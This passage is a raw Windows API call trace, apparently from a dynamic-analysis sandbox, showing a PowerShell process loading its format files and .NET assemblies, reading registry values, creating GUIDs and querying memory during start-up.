	[0336.249] CoTaskMemAlloc (cb=0x5a) returned 0x2906a0
	[0336.249] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d0dc, lpData=0x2906a0, lpcbData=0x14d0d8*=0x56 | out: lpType=0x14d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d0d8*=0x56) returned 0x0
	[0336.249] CoTaskMemFree (pv=0x2906a0) 
	[0336.249] RegCloseKey (hKey=0x32c) returned 0x0
	[0336.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0336.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0336.250] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x650b8614, Data2=0x6579, Data3=0x4996, Data4=([0]=0x91, [1]=0x7b, [2]=0x4, [3]=0x6e, [4]=0xfb, [5]=0x0, [6]=0xba, [7]=0x9))) returned 0x0
	[0336.252] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x9e78f2b8, Data2=0x46d7, Data3=0x44c0, Data4=([0]=0x83, [1]=0x2e, [2]=0x28, [3]=0x70, [4]=0x4a, [5]=0xb6, [6]=0xce, [7]=0xc2))) returned 0x0
	[0336.253] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x5c64039c, Data2=0x9703, Data3=0x4344, Data4=([0]=0x97, [1]=0xae, [2]=0xf1, [3]=0xa4, [4]=0x32, [5]=0x93, [6]=0xe6, [7]=0x4e))) returned 0x0
	[0336.254] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x54fb09a4, Data2=0x82a6, Data3=0x4450, Data4=([0]=0x85, [1]=0xb5, [2]=0xe3, [3]=0x79, [4]=0x23, [5]=0x6b, [6]=0xd1, [7]=0x6d))) returned 0x0
	[0336.254] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x26a0389a, Data2=0x3426, Data3=0x4d9f, Data4=([0]=0x9d, [1]=0xea, [2]=0x3c, [3]=0x40, [4]=0x4e, [5]=0x5f, [6]=0x76, [7]=0xd7))) returned 0x0
	[0336.255] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x3a3668b, Data2=0xe7c, Data3=0x4c36, Data4=([0]=0xb7, [1]=0x7f, [2]=0x8d, [3]=0x59, [4]=0x82, [5]=0x9b, [6]=0x69, [7]=0xba))) returned 0x0
	[0336.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.256] SetErrorMode (uMode=0x1) returned 0x1
	[0336.256] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0336.256] GetFileType (hFile=0x32c) returned 0x1
	[0336.256] SetErrorMode (uMode=0x1) returned 0x1
	[0336.256] GetFileType (hFile=0x32c) returned 0x1
	[0336.256] ReadFile (in: hFile=0x32c, lpBuffer=0x33df0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33df0b0*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.257] ReadFile (in: hFile=0x32c, lpBuffer=0x33df0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33df0b0*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.258] ReadFile (in: hFile=0x32c, lpBuffer=0x33df0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33df0b0*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.258] ReadFile (in: hFile=0x32c, lpBuffer=0x33df0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33df0b0*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.259] ReadFile (in: hFile=0x32c, lpBuffer=0x33df0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33df0b0*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.259] ReadFile (in: hFile=0x32c, lpBuffer=0x33df0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33df0b0*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0336.259] ReadFile (in: hFile=0x32c, lpBuffer=0x33df0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33df0b0*, lpNumberOfBytesRead=0x14d0f8*=0xaca, lpOverlapped=0x0) returned 1
	[0336.259] ReadFile (in: hFile=0x32c, lpBuffer=0x33de6e2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33de6e2*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0336.259] ReadFile (in: hFile=0x32c, lpBuffer=0x33df0b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x33df0b0*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0336.259] CloseHandle (hObject=0x32c) returned 1
	[0336.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.260] SetErrorMode (uMode=0x1) returned 0x1
	[0336.260] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d0a0 | out: lpFileInformation=0x14d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0336.260] SetErrorMode (uMode=0x1) returned 0x1
	[0336.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.260] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d188 | out: phkResult=0x14d188*=0x32c) returned 0x0
	[0336.260] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d10c, lpData=0x0, lpcbData=0x14d108*=0x0 | out: lpType=0x14d10c*=0x1, lpData=0x0, lpcbData=0x14d108*=0x56) returned 0x0
	[0336.260] CoTaskMemAlloc (cb=0x5a) returned 0x2906a0
	[0336.260] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d0dc, lpData=0x2906a0, lpcbData=0x14d0d8*=0x56 | out: lpType=0x14d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d0d8*=0x56) returned 0x0
	[0336.260] CoTaskMemFree (pv=0x2906a0) 
	[0336.260] RegCloseKey (hKey=0x32c) returned 0x0
	[0336.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0336.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0336.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0336.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0336.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0336.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0336.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0336.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0336.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0336.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0336.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0336.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0336.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0336.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0336.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0336.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0336.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0336.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0336.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.186] VirtualQuery (in: lpAddress=0x14bc20, lpBuffer=0x14cae0, dwLength=0x30 | out: lpBuffer=0x14cae0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.187] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x27ddd623, Data2=0xf774, Data3=0x4db8, Data4=([0]=0xb0, [1]=0xc9, [2]=0x0, [3]=0xac, [4]=0x5e, [5]=0x5c, [6]=0x38, [7]=0xce))) returned 0x0
	[0337.188] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xe41adfd4, Data2=0x8959, Data3=0x4a18, Data4=([0]=0xb5, [1]=0xbc, [2]=0xc, [3]=0xfc, [4]=0x51, [5]=0x84, [6]=0xc2, [7]=0x4c))) returned 0x0
	[0337.188] VirtualQuery (in: lpAddress=0x14bdd0, lpBuffer=0x14cc90, dwLength=0x30 | out: lpBuffer=0x14cc90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.189] VirtualQuery (in: lpAddress=0x14bdd0, lpBuffer=0x14cc90, dwLength=0x30 | out: lpBuffer=0x14cc90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.190] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x598b9f15, Data2=0xcfaa, Data3=0x47e5, Data4=([0]=0xab, [1]=0x1e, [2]=0x85, [3]=0x83, [4]=0x59, [5]=0x2e, [6]=0xdb, [7]=0x5f))) returned 0x0
	[0337.193] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x7ffceba3, Data2=0x116f, Data3=0x45ab, Data4=([0]=0xad, [1]=0x82, [2]=0x9a, [3]=0xa3, [4]=0x29, [5]=0x7f, [6]=0x7f, [7]=0xf9))) returned 0x0
	[0337.194] VirtualQuery (in: lpAddress=0x14c020, lpBuffer=0x14cee0, dwLength=0x30 | out: lpBuffer=0x14cee0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.194] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.194] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.194] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xd8f6829c, Data2=0x74ea, Data3=0x4f80, Data4=([0]=0xb5, [1]=0x66, [2]=0x51, [3]=0xc4, [4]=0x44, [5]=0x14, [6]=0xa2, [7]=0x11))) returned 0x0
	[0337.195] VirtualQuery (in: lpAddress=0x14c020, lpBuffer=0x14cee0, dwLength=0x30 | out: lpBuffer=0x14cee0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.195] VirtualQuery (in: lpAddress=0x14be40, lpBuffer=0x14cd00, dwLength=0x30 | out: lpBuffer=0x14cd00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.195] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.195] VirtualQuery (in: lpAddress=0x14b690, lpBuffer=0x14c550, dwLength=0x30 | out: lpBuffer=0x14c550*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.195] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xd290bc3e, Data2=0x2b33, Data3=0x4f44, Data4=([0]=0xb5, [1]=0xe1, [2]=0x33, [3]=0xe1, [4]=0x5e, [5]=0x38, [6]=0x50, [7]=0x8))) returned 0x0
	[0337.196] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x951b25b6, Data2=0x2f63, Data3=0x43cb, Data4=([0]=0xba, [1]=0xf1, [2]=0x85, [3]=0x65, [4]=0x80, [5]=0x4c, [6]=0x79, [7]=0xa))) returned 0x0
	[0337.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0337.196] SetErrorMode (uMode=0x1) returned 0x1
	[0337.196] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0337.196] GetFileType (hFile=0x32c) returned 0x1
	[0337.196] SetErrorMode (uMode=0x1) returned 0x1
	[0337.197] GetFileType (hFile=0x32c) returned 0x1
	[0337.197] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.526] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.527] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.527] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.528] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.528] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.528] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.528] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.529] ReadFile (in: hFile=0x32c, lpBuffer=0x34916a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x34916a8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
